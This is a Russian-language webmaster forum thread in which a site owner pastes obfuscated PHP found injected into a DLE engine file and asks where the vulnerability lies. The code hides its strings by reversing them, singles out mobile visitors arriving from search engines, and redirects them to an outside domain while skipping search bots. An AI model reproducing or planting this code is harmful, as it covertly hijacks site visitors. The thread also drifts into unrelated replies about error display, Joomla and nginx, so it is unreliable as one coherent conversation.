kgtu5

Рейтинг
209
Регистрация
21.07.2010
Sasha_M:
Всем доброго дня. Был в поездке, сейчас приехал и обнаружил на одном сайте (dle 10.0), в /engine/classes/mysql.php появился вот такой код:
*/
$usg = $_SERVER[strrev(strtoupper('tnega_resu_ptth'))];$ref = $_SERVER[strrev(strtoupper('tsoh_ptth'))];$rf = $_SERVER[strrev(strtoupper('rerefer_ptth'))];
if(!preg_match('/crawl|andex|oogle|bot/i',$usg)) {if(preg_match('/andex|mail|rambler|oogle/i',$rf))
{if((preg_match('/ndroid|midp|j2me|symbian|series\ 60|symbos|htc_/i',$usg)) and (!isset ($_COOKIE['dle_user_id'])) and ($_COOKIE["mt_"] != 1) and ($_COOKIE["ynd"] != 1))
{@setcookie('ynd', 1); header(strrev('//:pt'.'th :noi'.'tac'.'oL').$ref.'/');exit;}
else if(($_COOKIE["mt_"] != 1) && ($_COOKIE["ynd"] == 1)) {@setcookie('mt_', '1', time()+86400 * 7, '/'); header(strrev('=rerefer&1?'.'/ten.'.'lld-'.'swen'.'//:pt'.'th :noi'.'tac'.'oL').$ref);exit;}}}


код убрал, прошу спецов подсказать где копать на уязвимость.

проверяйте на шеллы (dle видимо не официальная)

chunya, будет утечка веса страниц.

The WishMaster:
выглядит стремно :)

dleblog.ru/114-modul-dude-smart-leech.html

вопрос в другом, корректно ли он установлен у ТСа или после переноса на другой хост потерялся.

masterfunk:
по вашему снести нельзя, отключить ошибки нельзя,

это тоже своеобразная суть России? :)

ошибка отсутствия файла никак не связана с работоспособностью модуля и дело не в России, а в "умных" сайтостроителях: deprecated ereg вылезет - display_errors=off, Failed opening - туда же его...

оффтоп к 9му посту: скажу смотря со своей колокольни - "не кладите все яйца в одну корзину" (с).

100 доменов-сайтов с одной стороны хорошо, дешего и сердито.

а если один из сайтов взломают? что будет проще: почистить 5 сайтов авардспейс или все 100 ваших?

какая версия nginx?

kopo6o4er:
Открываем php.ini или htaccess в зависимости от самого хостинга, где у Вас настройки php и ищем там display_errors=on и в этой строке вместо on ставим off
(это если нужно скрыть ошибку а не исправить ее)

чушь не надо советовать

ваш червь называется шелл-скрипт

да и 1.5.26 последняя в ветке, обновление желательно

версия joomla?

покажите пациента.

ТС зачем метаться с одного метода на другой, сделайте сначала что то одно и посмотрите нагрузку

Всего: 2207